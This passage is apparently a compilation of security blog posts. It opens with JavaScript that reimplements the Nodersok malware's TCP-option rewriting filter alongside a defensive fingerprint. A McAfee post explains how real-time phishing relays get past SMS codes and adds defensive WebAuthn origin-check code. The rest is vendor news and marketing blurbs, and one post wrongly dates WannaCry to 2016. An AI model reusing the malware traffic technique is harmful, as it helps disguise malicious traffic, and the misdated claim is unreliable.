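// Apply the rewrite to a full TCP segment (20-byte header + options + payload) and fix
// the Data Offset nibble (high four bits of byte 12). Returns null for segments the
// filter would leave alone.
function rewriteTcpSegment(seg) {
  const dataOffset = (seg[12] >> 4) * 4;
  if (dataOffset < 20 || dataOffset > seg.length) return null;
  const opts = seg.subarray(20, dataOffset);
  if (!matchesNodersokLayout(opts)) return null;
  const newOpts = rewriteOptions(opts);
  const hdr = Buffer.from(seg.subarray(0, 20));
  hdr[12] = (((20 + newOpts.length) / 4) << 4) | (seg[12] & 0x0f);
  return Buffer.concat([hdr, newOpts, seg.subarray(dataOffset)]);
}

// Defender-side fingerprint: options reading MSS, NOP, WScale, NOP, NOP, Timestamps,
// SACK permitted are consistent with having passed through Nodersok's filter.
function looksRewritten(opts) {
  let kinds;
  try { kinds = parseTcpOptions(opts).map((o) => o.kind); } catch (e) { return false; }
  return kinds.length === 7 && kinds[3] === OPT.NOP && kinds[4] === OPT.NOP &&
    kinds[5] === OPT.TIMESTAMP && kinds[6] === OPT.SACK_OK;
}

// Constructed sample: a SYN to port 443 with MSS 1460, window scale 8, zero timestamps.
const SAMPLE_OPTS = Buffer.from([
  0x02, 0x04, 0x05, 0xb4,             // MSS 1460
  0x01,                               // NOP
  0x03, 0x03, 0x08,                   // window scale 8
  0x04, 0x02,                         // SACK permitted
  0x08, 0x0a, 0, 0, 0, 1, 0, 0, 0, 0, // timestamps
]);
const SAMPLE_SYN = Buffer.concat([
  Buffer.from([0xc0, 0x00, 0x01, 0xbb,   // src port 49152, dst port 443
               0, 0, 0, 1, 0, 0, 0, 0,   // seq 1, ack 0
               0xa0, 0x02,               // data offset 10 words (40 bytes), SYN
               0xff, 0xff, 0, 0, 0, 0]), // window, checksum (unset), urgent pointer
  SAMPLE_OPTS,
]);

console.log(rewriteTcpSegment(SAMPLE_SYN).toString('hex'));
```

Two NOPs in the SACK-permitted slot followed by a trailing SACK-permitted option is not something a stock Windows stack emits, so `looksRewritten` applied to outbound SYNs in a packet capture is a cheap way to spot hosts already running the filter.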

Stopping the Nodersok campaign with Microsoft Defender ATP

Both the distributed network infrastructure and the advanced fileless techniques allowed this campaign to fly under the radar for a while, highlighting how having the right defensive technologies is of utmost importance in order to detect and counter these attacks in a timely manner.

If we exclude all the clean and legitimate files leveraged by the attack, all that remains are the initial HTA file, the final Node.js-based payload, and a bunch of encrypted files. Traditional file-based signatures are inadequate to counter sophisticated threats like this. We have known this for quite a while, that’s why we have invested a good deal of resources into developing powerful dynamic detection engines and delivering a state-of-the-art defense-in-depth through Microsoft Defender ATP:

Figure 10. Microsoft Defender ATP protections against Nodersok

Machine learning models in the Windows Defender Antivirus client generically detect the suspicious obfuscation in the initial HTA file used in this attack. Beyond this immediate protection, behavioral detection and containment capabilities can spot anomalous and malicious behaviors, such as the execution of scripts and tools. When the behavior monitoring engine in the client detects one of the more than 500 attack techniques, information like the process tree and behavior sequences is sent to the cloud, where behavior-based machine learning models classify files and identify potential threats.

Meanwhile, scripts that are decrypted and run directly in memory are exposed by Antimalware Scan Interface (AMSI) instrumentation in scripting engines, while launching PowerShell with a command line that specifies encoded commands is defeated by command-line scanning. Tamper protection in Microsoft Defender ATP protects against system modifications that attempt to disable Windows Defender Antivirus.

These multiple layers of protection are part of the threat and malware prevention capabilities in Microsoft Defender ATP. The complete endpoint protection platform provides multiple capabilities that empower security teams to defend their organizations against attacks like Nodersok. Attack surface reduction shuts common attack surfaces. Threat and vulnerability management, endpoint detection and response, and automated investigation and remediation help organizations detect and respond to cyberattacks. Microsoft Threat Experts, Microsoft Defender ATP’s managed detection and response service, further helps security teams by providing expert-level monitoring and analysis.

With Microsoft Threat Protection, these endpoint protection capabilities integrate with the rest of Microsoft security solutions to deliver comprehensive security for identities, endpoints, email and data, apps, and infrastructure.

 

Andrea Lelli
Microsoft Defender ATP Research

The post Bring your own LOLBin: Multi-stage, fileless Nodersok campaign delivers rare Node.js-based malware appeared first on Microsoft Security.

5G and IoT: How to Approach the Security Implications

Experts from Nokia, iboss and Sectigo talk 5G mobile security for internet of things (IoT) devices in this webinar YouTube video (transcript included).

Tackling biometric breaches, the decentralized dilemma

A recent discovery by vpnMentor revealed a worst case scenario for biometrics: a large cache of biometric data being exposed to the rest of the world. In this case web-based biometric security smart lock platform, BioStar 2, was breached. This breach surfaces a common flaw that many of the established providers of biometric authentication have built into their system. Many biometric providers store biometrics in a large centralized database. To avoid a biometric dystopia, adoption … More

The post Tackling biometric breaches, the decentralized dilemma appeared first on Help Net Security.

Cybersecurity breach experience strengthens CVs

It is in businesses’ best interest to hire cybersecurity leaders who have suffered an avoidable breach, because of the way it changes how security professionals think, feel and behave, according to Symantec. The findings reveal that suffering a breach – and coming out the other side – significantly reduces security leaders’ future workplace stress levels, while improving their likelihood to share knowledge. “It might sound counter intuitive at first,” comments Darren Thomson, CTO, Symantec EMEA, … More

The post Cybersecurity breach experience strengthens CVs appeared first on Help Net Security.

Adopting DevOps practices leads to improved security posture

A strong DevOps culture based on collaboration and sharing across teams leads to an improved security posture, according to Puppet. Twenty-two percent of the firms at the highest level of security integration have reached an advanced stage of DevOps maturity, compared to only six percent of the firms with no security integration. Additionally, the report found that Europe is pulling ahead of the US and the Asia Pacific regions when it comes to firms with … More

The post Adopting DevOps practices leads to improved security posture appeared first on Help Net Security.

Attention YouTubers: Protect Your Account From Being Hacked

Did you know that YouTube has 23 million content creators worldwide? Well, it turns out that many of these video gurus found themselves in the middle of a cybersecurity calamity this past weekend. According to Forbes, reporter Catalin Cimpanu discovered a massive spear-phishing campaign targeting YouTube content creators, tricking them into giving up their login credentials.

How are cybercriminals using this sneaky tactic to steal victims’ logins? Cimpanu found that the attackers used a substantial database to send emails to a targeted list of YouTube influencers. These emails contained phishing links luring the victims to fake Google login pages. Once the YouTuber entered their login credentials, the attacker gained full access to the victim’s YouTube account, allowing them to change the vanity URL. This leaves the actual owner of the channel and their subscribers believing that the account has been deleted. Additionally, some of the hijacked accounts used two-factor authentication (2FA) via SMS, suggesting that the cybercriminals used a reverse proxy: the phishing page sits between the victim and the real Google login service and relays everything the victim types to it in real time, so the SMS code is captured and used by the attacker before it expires.

Those targeted in this phishing scheme include mostly influencers covering a variety of genres, especially technology, music, gaming, and Disney. But with millions of content creators using YouTube as a platform to share their insights with the world, it’s critical that all users follow proper cybersecurity precautions to protect their credentials. So, what are some proactive steps YouTubers can take to ensure that their accounts are kept safe and secure? Check out the following tips:

  • Be on the lookout for phishing emails. If you receive an email from a company or business asking you to confirm your credentials, be skeptical. Phishers often forge messages from legitimate companies hoping to trick users into entering their login details.
  • Think before you click. Before clicking on a link, especially one in a suspicious email, hover over it to see if the URL address looks legitimate. If the URL contains misspellings, grammatical errors, or strange characters, it’s best to avoid interacting with the link.
  • Use two-factor authentication apps. While two-factor authentication is by no means an end-all, be-all security tactic, it does provide a good first line of defense if a hacker attempts to hijack your account. For this particular scheme, cybercriminals were able to bypass 2FA via SMS by intercepting the codes in real time. Therefore, users should look into authenticator app options rather than simply relying on a code sent over SMS. Keep in mind that a real-time relay captures any code the user types, including one generated by an authenticator app, so a method bound to the site’s origin, such as a hardware security key, is the stronger protection against this kind of phishing.
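
The difference between a typed code and an origin-bound login is easiest to see from the verifier's side. The block below is an added example, not McAfee's or Google's code, and it goes one step past the post's SMS-versus-app advice: an OTP check compares the code and nothing else, so a proxy that relays the victim's code inside its validity window is accepted; a WebAuthn-style check of clientDataJSON sees the origin the browser actually recorded, so a relay on another host fails the origin comparison. The origins (accounts.example, login-accounts.example), the challenge and the session records are constructed; signature verification over clientDataJSON is deliberately not shown.

```javascript
// Added example: verifier-side checks showing why a real-time phishing relay beats
// typed codes but not an origin-bound authenticator. Origins and data are constructed.

// Length-fixed comparison so the check itself does not leak the code by timing.
function constantTimeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// SMS/app OTP verification: the server learns only the code, never where it was typed.
// A proxy that relays the victim's code within the validity window is indistinguishable.
function verifyOtp(expectedCode, submittedCode) {
  return constantTimeEqual(expectedCode, submittedCode);
}

// WebAuthn-style check: the browser fills clientDataJSON with the challenge and the
// page origin before the authenticator signs it, so a proxy on a different host
// cannot present the real origin without breaking the signature.
function verifyClientData(clientDataJSON, { expectedOrigin, expectedChallenge }) {
  let data;
  try { data = JSON.parse(clientDataJSON); } catch (e) { return { ok: false, reason: 'malformed clientDataJSON' }; }
  if (data.type !== 'webauthn.get') return { ok: false, reason: 'wrong type' };
  if (data.challenge !== expectedChallenge) return { ok: false, reason: 'challenge mismatch' };
  if (data.origin !== expectedOrigin) return { ok: false, reason: `origin mismatch: ${data.origin}` };
  return { ok: true };
}

// Constructed scenario: the real site and a look-alike proxy host.
const REAL_ORIGIN = 'https://accounts.example';
const PROXY_ORIGIN = 'https://login-accounts.example';
const CHALLENGE = 'Y29uc3RydWN0ZWQtY2hhbGxlbmdl'; // constructed, base64url in practice

function runScenario() {
  // 1. Victim types the SMS code into the proxy's page; the proxy forwards it at once.
  const smsCode = '482913';
  const otpRelayAccepted = verifyOtp(smsCode, smsCode);

  // 2. Victim uses a security key on the real site: origin matches.
  const keyDirect = verifyClientData(
    JSON.stringify({ type: 'webauthn.get', challenge: CHALLENGE, origin: REAL_ORIGIN }),
    { expectedOrigin: REAL_ORIGIN, expectedChallenge: CHALLENGE });

  // 3. Victim uses the same key on the proxy's page: the browser stamps the proxy's origin.
  const keyViaProxy = verifyClientData(
    JSON.stringify({ type: 'webauthn.get', challenge: CHALLENGE, origin: PROXY_ORIGIN }),
    { expectedOrigin: REAL_ORIGIN, expectedChallenge: CHALLENGE });

  return { otpRelayAccepted, keyDirect: keyDirect.ok, keyViaProxy: keyViaProxy.ok, reason: keyViaProxy.reason };
}

console.log(runScenario());
```

The relay still has to defeat the authenticator's signature to change the origin field, which is why the origin check is the property that matters, not whether the code came by SMS or from an app.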

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Attention YouTubers: Protect Your Account From Being Hacked appeared first on McAfee Blogs.

Investing in Enterprise security is a necessity, not a luxury

Estimated reading time: 3 minutes

In the current ‘digital-first’ environment that organizations and businesses operate nowadays, success and failure can often depend on enterprise security solutions. Businesses operate in an environment where the threats from the digital sphere can often outweigh the threats from a physical sphere. The list of threats is huge and ever-expanding – malware, phishing, ransomware, cryptojacking, data breach, hacks, financial fraud, password loss and a lot more.

Neglecting cybersecurity has both financial and reputational damages. A study estimated that the average cost of a data breach rose 12% over the last few years to a staggering $3.92 million. And as some of the biggest organizations in the world like Equifax, Marriott International and Yahoo realized, threats have repercussions on brand value as well, affecting customer trust and reputation in a way that may not be possible to value monetarily but certainly leave a lasting impact.

That is why an increasing amount of organizations are waking up to the fact that enterprise security is no longer just an investment – it is a necessity and a requirement in today’s day and age.

Global research and advisory firm Gartner estimated that worldwide information security spending would exceed $124 billion in 2019.

How does treating enterprise security as a necessity benefit an organization? There are many ways, but some of the most important ones are:

  1. Your data is substantially safer

No organization is completely safe – cybersecurity is one of those sectors where every second, there are new threats to the organization. Such an environment demands to have a strong enterprise security framework to keep organizations safe.

Most cybercriminals use basic tools and strategies that are already identified and blocked by most enterprise security solutions, helping your data, your business and your employees stay safe from cybercrime. In fact, Seqrite’s range of enterprise security solutions allows administrators to see the number of breach attempts and the different cyber threats repelled, so they can understand how the enterprise is staying better protected.

  2. Helps to meet compliance and regulatory requirements

For any organization operating in the digital world, there are various regulations that it needs to comply with, depending on where the enterprise operates from and which countries its customers are based in.

Non-compliance with these regulations (GDPR, HIPAA, PCI DSS, etc.) can result in hefty fines – in extreme cases it can even destroy businesses. But enterprises that have deployed a cybersecurity solution will be in a much better position to meet compliance and regulatory requirements.

  3. Build cyber trust

The impact of cyber attacks can be disastrous – damaged reputation, a shrinking customer base, legal liabilities, etc. are all by-products that can undo the great work done by SMBs, SOHOs and enterprises, and possibly floor these businesses.

Enterprises need to work hard to avoid this kind of situation and to win the trust of their users and stakeholders by assuring them that they are taking the best possible measures to keep data safe. Once stakeholders and customers are convinced that the organization they are interacting with and entrusting with their valuable data is serious about keeping it safe with the help of enterprise security, trust is built, and that can be a key differentiator in customer loyalty.

  4. Preventing the loss of business

An enterprise that suffers a data breach or cyber attack suffers a loss in business. Client data is compromised, confidential data may be leaked and the data, if backed up, may take months to recover. In the worst-case scenario, if data is not backed up, it may be irretrievable.

All of these contribute to a major loss of business for an enterprise, which it can avoid to a certain extent by investing in an enterprise security framework.

Organizations can consider solutions like Seqrite’s Endpoint Security, a simple and comprehensive platform to protect enterprise networks from advanced threats, and Unified Threat Management, a one-stop solution for all enterprise security needs.

The post Investing in Enterprise security is a necessity, not a luxury appeared first on Seqrite Blog.

Rise of RDP as a target vector

Recent reports of targeted attacks using RDP as an initial entry vector have certainly caused significant headlines in light of the impact they have caused. In the midst of city-wide impacts, or even million-dollar (plus) demands, it is easy to overlook the initial entry vector. What began as ‘targeted’ emails focusing predominantly on consumers has evolved, as ransomware has widened to incorporate pseudo-attacks intended purely for destruction (e.g. no viable decryption capability, … More

The post Rise of RDP as a target vector appeared first on Help Net Security.

99% of misconfiguration incidents in the cloud go unnoticed

IaaS is now the fastest growing area of the cloud due to the speed, cost and reliability with which organizations can create and deploy applications, according to McAfee.

Cloud-Native Breach (CNB) attack chain

The results of the survey demonstrate that 99 percent of IaaS misconfigurations go unnoticed—indicating that awareness around the most common entry point to new “Cloud-Native Breaches” (CNB) is extremely low. “In the rush toward IaaS adoption, many organizations overlook the shared responsibility model … More

The post 99% of misconfiguration incidents in the cloud go unnoticed appeared first on Help Net Security.

Older vulnerabilities and those with lower severity scores still being exploited by ransomware

Almost 65% of top vulnerabilities used in enterprise ransomware attacks targeted high-value assets like servers, close to 55% had CVSS v2 scores lower than 8, nearly 35% were old (from 2015 or earlier), and the vulnerabilities used in WannaCry are still being used today, according to RiskSense. The data was gathered from a variety of sources including RiskSense proprietary data, publicly available threat databases, as well as findings from RiskSense threat researchers and penetration testers. … More

The post Older vulnerabilities and those with lower severity scores still being exploited by ransomware appeared first on Help Net Security.

Security capabilities are lagging behind cloud adoption

Security professionals regard their existing tools as inadequate for securing critical cloud data, even as their organizations invest heavily, and with increasing speed, in cloud applications, according to ESG. The report, based on surveys with responses ranging from approximately 392 to 600 senior IT decision makers and cyber security professionals, reveals that cloud-first strategies are becoming more common, with 39 percent of respondents from cloud-first organizations saying that they only consider on-premises if someone makes a compelling business case … More

The post Security capabilities are lagging behind cloud adoption appeared first on Help Net Security.

Could audio warnings augment your ability to fight off cyber attacks?

The security of your environment shouldn’t depend on whether you’re looking in the right place at the right time. While active visual means such as dashboards, emails, tickets, and chat messages are a vital part of security event monitoring, they might not get your attention if your eyes are elsewhere. Even when you’re focused on the right screen, important events can easily get buried in an overload of information, delaying their processing – or allowing … More

The post Could audio warnings augment your ability to fight off cyber attacks? appeared first on Help Net Security.

CISO role grows in stature, but challenges remain

In order to find out how CISOs perceive the state of their profession, Optiv Security interviewed 200 CISOs or senior security personnel with equivalent responsibilities in both the US and the UK.

Perceiving cybersecurity

Survey respondents indicated a fundamental change in how senior executives and board members perceive cybersecurity. Perhaps most surprising was the fact that 58% said experiencing a data breach makes them more attractive to potential employers. This stands in stark contrast to … More

The post CISO role grows in stature, but challenges remain appeared first on Help Net Security.

$5 trillion threat of cyber attacks spur investments in solutions, talent and tech

IT & Business Services M&A Market’s disclosed deal value reached a whopping $97 billion in 1H 2019 – the highest total on record for a six-month period, according to Hampleton Partners. There has also been a significant rise in valuations, with overall median disclosed deal amount reaching $43 million in 1H 2019, up from $23 million in 2H 2018. Deal volume lessened, with 370 transactions inked compared to 432 in 2H 2018. However, trailing 30-month … More

The post $5 trillion threat of cyber attacks spur investments in solutions, talent and tech appeared first on Help Net Security.

How data breaches forced Amazon to update S3 bucket security

Amazon launched its Simple Storage Service (better known as S3) back in 2006 as a platform for storing just about any type of data under the sun. Since then, S3 buckets have become one of the most commonly used cloud storage tools for everything from server logs to customer data, with prominent users including Netflix, Reddit, and GE Healthcare. While S3 rolled out of the gate with good security principles in mind, it hasn’t all … More

The post How data breaches forced Amazon to update S3 bucket security appeared first on Help Net Security.

How important is packet capture for cyber defense?

Organizations using full packet capture are better prepared to battle cyber threats, according to an Enterprise Management Associates (EMA) report.

Visibility and accuracy of packet capture

The report highlights that the visibility and accuracy of packet capture data provides the best source of certainty for threat detection, and notes that the adoption of full packet capture has accelerated over the past 12 months. The report concludes that “…it is clear that those using packet capture … More

The post How important is packet capture for cyber defense? appeared first on Help Net Security.

Product showcase: NetLib Security Encryptionizer

NetLib Security has spent the past 20+ years developing a powerful, patented solution that starts by setting up a defense for any organization wherever your data resides: physical, virtual and cloud. Our platform is geared to simplify the process for you while ensuring unprecedented levels of security are in place. NetLib Security encryption solutions do not require specialized skill sets, programming changes, or administrative overhead; we simplify your data security needs with an affordable solution … More

The post Product showcase: NetLib Security Encryptionizer appeared first on Help Net Security.

5 Cybersecurity Trends in the Professional Services Sector

Cybersecurity is an increasingly significant focus for many companies as cyberattacks become more frequent and more costly.

What are the five cybersecurity trends in the professional services sector?

Professional services organizations are especially vulnerable due to the high value of the industry and the data they store — like Social Security numbers, personal financial information and classified business communications.

Employees with non-technical backgrounds or low digital literacy often need access to networks that store highly sensitive data. But these same employees are the most vulnerable to cybercriminals.

The cybersecurity landscape is changing, and every industry will need to adapt. But professional services companies should pay the closest attention to these five trends.

1. Employee Training on Phishing and Digital Security

Hackers aren’t only coders — they’re also social engineers. When the network becomes harder to access, unprepared employees are one of the next best vectors of attack. One in 99 emails is a phishing attack, a fraudulent email designed to look legitimate so an employee will click on a malicious link inside or reply with privileged information.

Employees will need training on digital safety: how to spot phishing emails, and also how to spot bad links and downloads that can be a vector for viruses or other attacks.

2. Hackers Target Mobile Devices

Most phishing happens over email. But hackers can target any device that connects to the internet — including your smartphone. And once a hacker has access to your device, it can be trivial to, for example, intercept and store copies of all the emails you receive. Or use your digital credentials to gain access to confidential information.

IT departments will also need to train employees on the security of personal devices, and — if necessary — restrict what sort of devices can access sensitive data.

3. Ransomware Will Cost Businesses More

Ransomware is a term used to describe viruses that encrypt all the files on a user’s computer and hold them hostage for a fee. Ransomware costs small businesses an estimated $75 billion each year. And the ransoms continue to get higher and higher.

One major virus — the WannaCry ransomware — nearly shut down the British health care system in 2016. The virus is still infecting computers, even though researchers discovered a killswitch in the virus’ code two years ago.

In 2016, the professional services industry in the United States had a value of $1,100 billion. The industry’s presumed high ability to pay makes it a major target for ransomware.

Cybersecurity professionals need to learn how to respond to this specific kind of attack, and employees need training in digital literacy that will help them identify ransomware attacks and refer them to a security professional.

4. Data Privacy and Data Stewardship Are Becoming High Priorities

New data regulations, like the GDPR in Europe, have made data breaches more costly than ever. Companies who hold on to customer data must take the necessary precautions to defend that data by encrypting the data and restricting access to their network. Companies must also inform customers as soon as possible after a breach — sometimes within just a few days.

Companies, seeing the fines paid by major businesses like Equifax and British Airways, will want to beef up their security in a way that complies with U.S. (and possibly GDPR) regulations. These companies will also want to prepare for the worst-case scenario — how will we know if there has been a breach? And how will we respond?

5. Automation and AI Will Come to Cybersecurity

In cybersecurity, a burnout crisis is looming on the horizon. As demand outstrips the number of cybersecurity professionals on the job market, cybersecurity experts are working longer hours, defending against more threats — and shouldering more of the blame in the case of a breach. Cybercrimes are more common than ever, but the number of people entering cybersecurity hasn’t kept up.

Enterprises, wanting to lighten the burden placed on their IT and cybersecurity teams, are looking for any chance to automate processes.

Cybersecurity platforms that use artificial intelligence to beat digital threats are the latest trend in cybersecurity solutions — even if cybersecurity experts are wary of the technology. Expect AI-based cybersecurity tools to become commonplace in the future, but don’t expect them to make your company invulnerable to attack.

What These Changes Mean for Professional Services

The professional services industry will need to adapt to a changing cybersecurity landscape. As data breaches become more common, businesses will need to make sure their employees can spot suspicious emails and links. And even the most secure company should prepare for the possibility of a data breach.

Cybersecurity is constantly advancing, but so are cybercriminals. The professional services industry will need to stay on top of these trends to keep its information safe.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post 5 Cybersecurity Trends in the Professional Services Sector appeared first on Security Affairs.

Researchers analyzed 16.4 billion requests to see how bots affect e-commerce

The sophistication level of bots attacking e-commerce sites is on the rise, with nearly four-fifths (79.2 percent) classified as moderate or sophisticated, up from 75.8 percent in 2018, according to the Imperva report. The report analyzed 16.4 billion requests from 231 domains during the month of July 2019. E-commerce companies suffer from a continual barrage of bad bots that criminals, competitors, resellers and investment companies use to carry out unauthorized price scraping, inventory checking, denial … More

The post Researchers analyzed 16.4 billion requests to see how bots affect e-commerce appeared first on Help Net Security.

Some IT teams move to the cloud without business oversight or direction

27% of IT teams in the financial industry migrated data to the cloud for no specific reason, and none of them received financial support from management for their cloud initiatives, according to Netwrix. Moreover, every third organization that received no additional cloud security budget in 2019 experienced a data breach. Other findings revealed by the research include: 56% of financial organizations that had at least one security incident in the cloud last year couldn’t determine … More

The post Some IT teams move to the cloud without business oversight or direction appeared first on Help Net Security.

Is Your Medical Data Safe? 16 Million Medical Scans Left Out in the Open

Have you ever needed to get an X-ray or an MRI for an injury? It turns out that these images, as well as the health data of millions of Americans, have been sitting unprotected on the internet and available to anyone with basic computer expertise. According to ProPublica, these exposed records affect more than 5 million patients in the U.S. and millions more across the globe, equating to 16 million scans worldwide that are publicly available online.

This exposure affects data used in doctor’s offices, medical imaging centers, and mobile X-ray services. What’s more, the exposed data also contained other personal information such as dates of birth, details on personal physicians, and procedures received by patients, bringing the potential threat of identity theft closer to reality. And while researchers found no evidence of patient data being copied from these systems and published elsewhere, the implications of this much personal data exposed to the masses could be substantial.

To help users lock down their data and protect themselves from fraud and other cyberattacks, we’ve provided the following security tips:

  • Be vigilant about checking your accounts. If you suspect that your data has been compromised, frequently check your bank account and credit activity. Many banks and credit card companies offer free alerts that notify you via email or text messages when new purchases are made, if there’s an unusual charge, or when your account balance drops to a certain level. This will help you stop fraudulent activity in its tracks.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you to monitor your accounts, alert you of any suspicious activity, and help you to regain any losses in case something goes wrong.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Is Your Medical Data Safe? 16 Million Medical Scans Left Out in the Open appeared first on McAfee Blogs.

Eight great habits that enterprises can practice for bolstering cybersecurity

Estimated reading time: 3 minutes

Efficient cybersecurity is built on the foundation of good habits practised by internal customers. Enterprises may think a great deal about implementing effective cybersecurity practices and have plenty of meetings, but it’s actually not that complicated.

An effective framework is the first step, but more important is ensuring that effective habits are formed.

Unfortunately, enterprises are populated by humans who like to take the easier but riskier way out. Whether it’s setting the same password across all accounts, leaving data freely available or using company devices on risky Wi-Fi networks, bad habits can be problematic.

Here are a few tendencies that should be eliminated as soon as possible.

  1. Weak passwords

The problem with weak passwords is an issue that plagues an entire organization, from the top to the bottom. It’s not enough to have a policy about strong passwords – it’s also important to run regular campaigns across the entire organization with real-life case studies to educate employees on the importance of using strong passwords and how to do so.

  2. A lack of a security policy

The lack of a single unified security policy is an extremely bad enterprise security habit. A proper policy keeps all information and strategies in one place, becoming a one-stop repository in case of crises. Without a security policy, it is difficult for enterprises to remain protected.

  3. Taking shortcuts

When enterprises underestimate the damage cyberattacks can cause, the tendency is to run towards shortcuts. This means being reactive to attacks and not taking cybersecurity seriously: running only the most basic of solutions and not investing much time and energy. This is a recipe for disaster – cybersecurity is an extremely important function of an enterprise today and needs to be taken as seriously as any other function.

  4. Forgetting to have cybersecurity drills

Just like fire safety drills, it’s important to have regular cybersecurity drills. This inculcates preparedness into employees and gives them an idea of what happens during a cyberattack. But many organizations go for months and years without having one. This makes them extremely unprepared in the event of an actual cyber attack.

  5. Delayed patching and updating

Vulnerabilities in enterprise software are found almost every day, and patches and updates are released to keep businesses safe from a cyber strike. But organizations are often guilty of not keeping their software patched against known vulnerabilities. Hackers and cybercriminals are aware of this and often use these vulnerabilities to enter systems and cause immense chaos.

  6. Not investing in backup

An enterprise security framework goes a long way in enabling protection and strong solutions can also play a part. But it’s always important to have a fallback plan and that is where backup comes in. By backing up critical data at regular intervals, enterprises can ensure they have something to fall back on, in case of critical situations. However, many enterprises neglect this important step and as a result, put themselves at great risk in the event of unforeseen circumstances.

  7. Underestimating social engineering

Many enterprises can slip into the notion that cybersecurity is purely a technological problem and that putting a strong cybersecurity solution in place can solve all problems. But that is not the case – social engineering is as big an issue as technical security nowadays. The only way to address it is to ensure that employees are well-versed in cybersecurity issues.

  8. The problem with access control

Access control is an issue almost every organization struggles with. They may have the strongest firewalls, but these can sometimes be of no use if every user in the organization has access to everything. That makes the company very susceptible to insider breaches. It also means that if a hacker manages to gain control of a system with access to the network, they can compromise the entire IT infrastructure.

Seqrite’s Unified Threat Management (UTM) provides a one-stop solution for many of the problems identified above. It acts as the first line of defence, providing IT security management, a safe working environment, high productivity and regulatory compliance in a cost-effective way.

The post Eight great habits that enterprises can practice for bolstering cybersecurity appeared first on Seqrite Blog.

How organizations view and manage cyber risk

Amid a wider range of issues to handle, a majority of board members and senior executives responsible for their organization’s cyber risk management had less than a day in the last year to spend focused on cyber risk issues, the 2019 Marsh Microsoft Global Cyber Risk Perception Survey results have revealed. This lack of time for senior leaders to focus on cyber risk comes as concern over cyber threats hits an all-time high, and as … More

The post How organizations view and manage cyber risk appeared first on Help Net Security.

Chapter Preview: It All Starts with Your Personal Data Lake

Once, not long ago, data was nestled in paper files or stored on isolated computer networks, housed in glassed-off, air-conditioned rooms. Now, data is digital, moves effortlessly, and gets accessed from devices and places around the world at breakneck speeds. This makes it possible for businesses, organizations, and even individuals to collect and analyze this data for a whole host of purposes, such as advertising, insurance proposals, and scientific research, to name but a few. The data they are collecting and accessing about you is part of your personal data lake.

Data lake is a term that technologists typically use, but for us, using the term paints a strong visual for an important concept—how we create an extraordinary amount of data simply by going online and using connected devices. Your online interactions create drops of data that collect into streams, and pool together to form an ever-deepening lake of data over time. It stands to reason that the more time you spend online, connecting devices in your home and accessing a growing number of applications on your smartphone, the more quickly your personal data lake grows.

As you can imagine, your privacy and security are what’s at stake as you go about your digital life. Ultimately, the more data you share, either knowingly or unknowingly, the more that data potentially puts you at risk. This is true for you and your family members. The stakes get even higher because some of our own behavior can put us at risk. The internet is a platform with a global reach and a forever memory. What you say, do, and post can have a lifetime of implications. As a family, each member has a personal responsibility to look after themselves and each other. This unwritten contract extends to the internet because our actions there can impact our personal and professional lives, not to mention the lives of others. This book is laden with examples of how people get passed over for jobs, ruin romantic relationships, and end up doing actual physical harm to others because of what they say, do, or post online, ranging from sharing a picture of someone passed out at a party because it seemed funny at the time, to something calculated and intentionally injurious, like cyberbullying.

With people admitting that they increasingly spend more time online while connecting more and more devices in our homes, it’s time to understand the permanence of those behaviors and how they can impact all aspects of your life. As you go through the book you’ll better understand how your personal data lake is constantly growing, while laying out useful tips you can use to better manage your information.

Gary Davis’ book, Is Your Digital Front Door Unlocked?, is available September 5, 2019 and can be ordered at amazon.com.

The post Chapter Preview: It All Starts with Your Personal Data Lake appeared first on McAfee Blogs.

What Is Advanced Threat Protection?

Advanced Threat Protection, or ATP, is a type of security solution specifically designed to defend a network or system from sophisticated hacking or malware attacks that target sensitive data. ATP is usually available as a software or managed security service. Advanced Threat Protection solutions differ in terms of approach and components, but most include endpoint agents, email gateways, network devices, malware protection systems, and a centralized management console in order to manage defenses and correlate alerts.

How Advanced Threat Protection Works

Advanced Threat Protection has three primary objectives:

  1. Detecting threats before they have any opportunity to access critical data or breach any system.
  2. Having adequate protection to defend against any and all detected threats.
  3. Responding to and mitigating threats and other security events.

In order to achieve this, there are several components that are important to Advanced Threat Protection solutions. These include:

Real-Time Visibility

Having real-time visibility into whatever is happening allows threats to be detected before they do any damage.

Context

Threat alerts should contain context for true security efficiency. This allows the security teams to prioritize threats and organize a proper response.

Data Awareness

There is a need for Advanced Threat Protection to have a deep understanding of enterprise data, its sensitivity, value, and other factors contributing to the formulation of a proper response.

After a threat is detected, analysis on what happened is needed. Advanced Threat Protection teams typically handle the threat analysis, which enables the enterprise to continue business as usual while monitoring, analysis, and response happens behind the scenes. Threats are then prioritized based on their potential to cause damage and the data at risk. Advanced Threat Protection should be able to address three key areas:

  1. Stopping attacks in progress or mitigating the threats before they are able to breach the system.
  2. Disrupting the activity or countering the actions that have been done by a breach.
  3. Interrupting the lifecycle of the attack and ensuring that the threat is unable to proceed.

Benefits of Advanced Threat Protection Services

The main benefit of having an Advanced Threat Protection service is being able to prevent, detect, and respond to sophisticated or new types of attacks designed to bypass traditional security solutions like firewalls, IPS/IDS, and antivirus software. As attacks continue to become more targeted and persistent, Advanced Threat Protection solutions provide a proactive approach to security, identifying and removing threats before any data is compromised.

Advanced Threat Protection solutions provide access to a global community of professionals dedicated to cybersecurity. This allows for sharing and augmenting threat intelligence and analysis using information from third parties, which in turn, allows for fast and easy updating of defenses against new threats detected by the global community.

